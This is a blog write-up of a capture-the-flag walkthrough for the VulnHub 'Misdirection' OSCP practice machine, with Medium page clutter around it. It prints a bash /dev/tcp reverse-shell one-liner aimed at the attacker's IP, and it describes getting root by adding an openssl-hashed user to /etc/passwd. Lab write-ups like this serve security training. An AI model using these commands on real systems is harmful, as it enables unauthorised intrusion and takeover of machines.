Hacking MISDIRECTION- VulnHub

(OSCP similar practice machine)

Vulnhub Description

The purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.

So Let’s dive into pwning the machine and gain a root shell

______________________________________

Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128

For the initials, let’s go for scanning and enumeration, I got the results as:

Hmm.. we got some standard ports. Both 80, 8080 has webpage up and running. So first i hop over to http://192.168.230.128:8080.

After that I brute force the web-directories to find some way in and results that showed up are:

After enumerating all of these, some interesting ones found are:

/debug , /wordpress

wordpress was hardcoded with I.P 192.168.1.61:8080. Either I update my /etc/host file or review it later(because I doubt due to the machine’s name ;-/)

So i jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!

So i ran the command to get a reverse shell:

/bin/bash -c ‘/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &’

My box was listening to this port, and YES!! we got a shell. Checking for sudo permissions allowed and we got something very easily:

Okay, so without furthur ado as per results, I switched to bretix. This user is allowed to edit the /etc/passwd AWESOME!!!

Now we are going to create a user on the target machine with it’s entry is /etc/passwd file. Here we’ll be using openssl for salted hash

openssl passwd -1 -salt user3 pass123

Back to the target machine. Here we are going to use the hash that we generated in the previous step and make a user neelesh which has the elevated privilege. Now, all we got to do is run su command with the user name we just created and enter the password and root shell.

And we are root!!

That’s all for now,

Until Next Time,

I’m Neelesh, Thanks for the read…

— — — — — — — — — — — — — →

Ping me if you face any issues

Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/

— — — — — — — — — — — — — →

--

--

--

Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Troubleshooting in Java for when your Error Message is too Vague and nothing Useful Comes Up on…

Create NuGet Package with .NET

New to coding? Hone your skills with Codecademy.

Programming or Painting

a painting covered by code

PDF handling: how to merge (many) separate odd and even pages to a single document

Hello Coherence — Bootiful Spring

Building a Simple CRUD with Node, Express, and MongoDB

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

HackTheBox: BountyHunter

Backdoor Hackthebox Write-up| Backdoor Hackthebox Walkthrough

HackTheBox-Writer

TryHackMe | CTF | Walkthrough | Raven